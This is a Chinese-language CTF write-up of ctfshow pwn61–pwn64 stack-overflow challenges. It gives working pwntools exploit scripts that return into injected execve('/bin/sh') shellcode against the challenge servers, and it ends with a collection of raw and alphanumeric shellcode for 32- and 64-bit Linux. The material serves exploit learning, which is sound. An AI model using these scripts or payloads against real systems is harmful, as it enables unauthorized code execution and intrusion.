ctfshow刷题笔记—栈溢出—pwn61~pwn64

目录

前言

一、pwn61（输出了什么？）

二、pwn62（短了一点）

三、pwn63(又短了一点)  

四、pwn64(有时候开启某种保护并不代表这条路不通)

五、一些shellcode

前言

这几道都是与shellcode有关的题，实在是不会写，还是试了试，记录一下，收集了一些shellcode。

---

一、pwn61（输出了什么?）

checksec 一下：

┌──(kali㉿kali)-[~/桌面/ctfshoww]
└─$ checksec --file=pwn61
[*] '/home/kali/桌面/ctfshoww/pwn61'Arch:       amd64-64-littleRELRO:      Partial RELROStack:      No canary foundNX:         NX unknown - GNU_STACK missingPIE:        PIE enabledStack:      ExecutableRWX:        Has RWX segments
Stripped:   No

开了地址随机化。

现在先看一下main函数

int __cdecl main(int argc, const char **argv, const char **envp)
{__int64 v4; // [sp+0h] [bp-10h]@1__int64 v5; // [sp+8h] [bp-8h]@1v4 = 0LL;v5 = 0LL;setvbuf(_bss_start, 0LL, 1, 0LL);logo();puts("Welcome to CTFshow!");printf("What's this : [%p] ?\n", &v4, 0LL, 0LL);puts("Maybe it's useful ! But how to use it?");gets(&v4);return 0;
}

主要是打印logo信息，值得注意的是会输出一个地址，查看一下v4:

0x10+x08,我们写入shellcode以后，通过返回v4的地址取让程序执行shellcode

本地运行一下：

Welcome to CTFshow!
What's this : [0x7ffdb824c790] ?
Maybe it's useful ! But how to use it?

v4ar=0x7ffd9de01430

一开始我就是这样写的：

from pwn import *
context.log_level='debug'
context.arch='amd64'
p=remote("pwn.challenge.ctf.show",28164)
pad=b'a'*(0x10+0x8)
v4ar=0x7ffdb824c790
shellcode=asm(shellcraft.sh())
payload1=pad+p64(v4ar)+shellcode
p.sendline(payload1)
p.interactive()

发现打不通，似乎忽略了一些东西，于是去读了大佬们的文章。

遇到的一个问题是shellcode太长，超出了v4,v5的范围，这是为什么呢？

Shellcode 的长度通常会超过 v5 的空间（8 字节）。如果直接覆盖 v5，Shellcode 的部分内容可能会被截断。此外，leave ret 之后，程序可能会跳转到一个无效地址，导致崩溃。

去搜索了一下leave

等价于 mov rsp, rbp 和 pop rbp。

它将 rbp 的值赋给 rsp，从而恢复上一个栈帧的栈指针。

然后从栈上弹出 rbp 的值，恢复上一个栈帧的基指针。

所以我们把shellcode写在v5后面就是pad+b’a’*0x8的位置，因为还有一个返回地址的位置.

还有就是输出的地址是动态的，每次不一样。

from pwn import *
context(arch="amd64",log_level="debug")
p=remote("pwn.challenge.ctf.show",28297)
pad=0x10+8
shellcode = asm(shellcraft.sh())
p.recvuntil("What's this : [")        
v5ar = eval(p.recvuntil(b"]",drop=True))    
#drop=True是为去掉"]"
#eval()是将str数据转为整型数据
print(hex(v5ar))
payload=flat([cyclic(pad),v5ar+pad+8,shellcode])
p.sendline(payload)
p.interactive()

注意返回地址v5的地址加pad+8,不是填充字符。

---

二、pwn62（短了一点）

checksec和上一道题差不多:

┌──(kali㉿kali)-[~/桌面/ctfshoww]
└─$ checksec --file=pwn62
[*] '/home/kali/桌面/ctfshoww/pwn62'Arch:       amd64-64-littleRELRO:      Partial RELROStack:      No canary foundNX:         NX unknown - GNU_STACK missingPIE:        PIE enabledStack:      ExecutableRWX:        Has RWX segments
Stripped:   No

也是地址随机化，提前运行的界面和上一道题差不多，会给一个地址。

拖进ida看一看。

看一下main函数：

int __cdecl main(int argc, const char **argv, const char **envp)
{FILE *v3; // rdi@1__int64 buf; // [sp+0h] [bp-10h]@1__int64 v6; // [sp+8h] [bp-8h]@1buf = 0LL;v6 = 0LL;v3 = _bss_start;setvbuf(_bss_start, 0LL, 1, 0LL);logo(v3, 0LL);puts("Welcome to CTFshow!");printf("What's this : [%p] ?\n", &buf, 0LL, 0LL);puts("Maybe it's useful ! But how to use it?");read(0, &buf, 0x38uLL);return 0;
}

看一下这个buf:

-0000000000000010 buf             dq ?
-0000000000000008 var_8           dq ?
+0000000000000000  s              db 8 dup(?)
+0000000000000008  r              db 8 dup(?)

0x10+0x8

这里的shellcode是有限制的。

from pwn import *
context(arch="amd64",log_level="debug")
p=remote("pwn.challenge.ctf.show",28295)
offset=0x10+0x8
p.recvuntil("[")
buf_ar=eval(p.recvuntil(b"]",drop=True))
print(hex(buf_ar))
shellcode=b'\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05'
payload=offset*b'a'+p64(buf_ar+offset+8)+shellcode
p.sendline(payload)
p.interactive()

---

三、pwn63(又短了一点)  

checksec一下：

  [*] You have the latest version of Pwntools (4.14.0)
[*] '/home/kali/桌面/ctfshoww/pwn63'Arch:       amd64-64-littleRELRO:      Partial RELROStack:      No canary foundNX:         NX unknown - GNU_STACK missingPIE:        PIE enabledStack:      ExecutableRWX:        Has RWX segments
Stripped:   No

开了地址随机化，拖进ida看一看和上一道题有什么区别。

确实有一些变化：

 puts("Maybe it's useful ! But how to use it?");read(0, &buf, 0x37uLL);

看一下buf

-0000000000000010 buf             dq ?
-0000000000000008 var_8           dq ?
+0000000000000000  s              db 8 dup(?)
+0000000000000008  r              db 8 dup(?)

0x10+0x8

from pwn import *
context(arch="amd64",log_level="debug")
p=remote("pwn.challenge.ctf.show",28222)
offset=0x10+0x8
p.recvuntil("[")
buf_ar=eval(p.recvuntil(b"]",drop=True))
print(hex(buf_ar))
shell=b'\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05'
payload=offset*b'a'+p64(buf_ar+offset+8)+shell
p.sendline(payload)
p.interactive()

---

四、pwn64(有时候开启某种保护并不代表这条路不通)

有点意思，先checksec一下：

┌──(kali㉿kali)-[~/桌面/ctfshoww]
└─$ checksec --file=pwn64
[*] '/home/kali/桌面/ctfshoww/pwn64'Arch:       i386-32-littleRELRO:      Partial RELROStack:      No canary foundNX:         NX enabledPIE:        No PIE (0x8048000)
Stripped:   No

虽然开了栈不可执行，但是程序里有不一样的东西：

buf = mmap(0, 0x400u, 7, 34, 0, 0);

一开始我也不知道这是什么，查了一下：

mmap 是一个系统调用，用于创建一个内存映射区域。它通常用于以下场景：

·映射文件到内存，以便可以像访问内存一样访问文件内容。

·创建匿名内存区域，用于分配动态内存。

·共享内存，用于进程间通信。

根据之前学的知识，7（port参数）是可读可写的意思，所以，我们任然可以注入shellcode。

void* mmap(void* addr, size_t length, int prot, int flags, int fd, off_t offset);

0x400字节足够我们放下shellcode,总之试一试：

from pwn import *
p=remote("wn.challenge.ctf.show",28201)
shellcode=asm(shellcraft.sh())
payload=shellcode
p.sendline(payload)
p.interactive()

打通之后快些ls,因为有定时器，如果想更长一点可以加一段shellcode，但是用处不大，因为我也不太会写shellcode,所以问了问人机了解了一下：

from pwn import *
p=remote("wn.challenge.ctf.show",28201)
alarm_close=asm("""mov eax,37xor ebx,ebxint 0x80
""",arch='i386')
shellcode=asm(shellcraft.sh())
payload=alarm_close+shellcode
p.sendline(payload)
p.interactive()

---

五、一些shellcode

关于shellcode我也不会写，所以去搜了一些shellcode，一般情况下还是能用的。

不可见：

32位段字节shellcode（21字节）

\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80

64位较短的shellcode（23字节）

\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05

可见版本（由可见字符组成）：

X64:

Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t

32位：

PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIRJTKV8MIPR2FU86M3SLIZG2H6O43SX30586OCRCYBNLIM3QBKXDHS0C0EPVOE22IBNFO3CBH5P0WQCK9KQXMK0AA

---

继续学习中......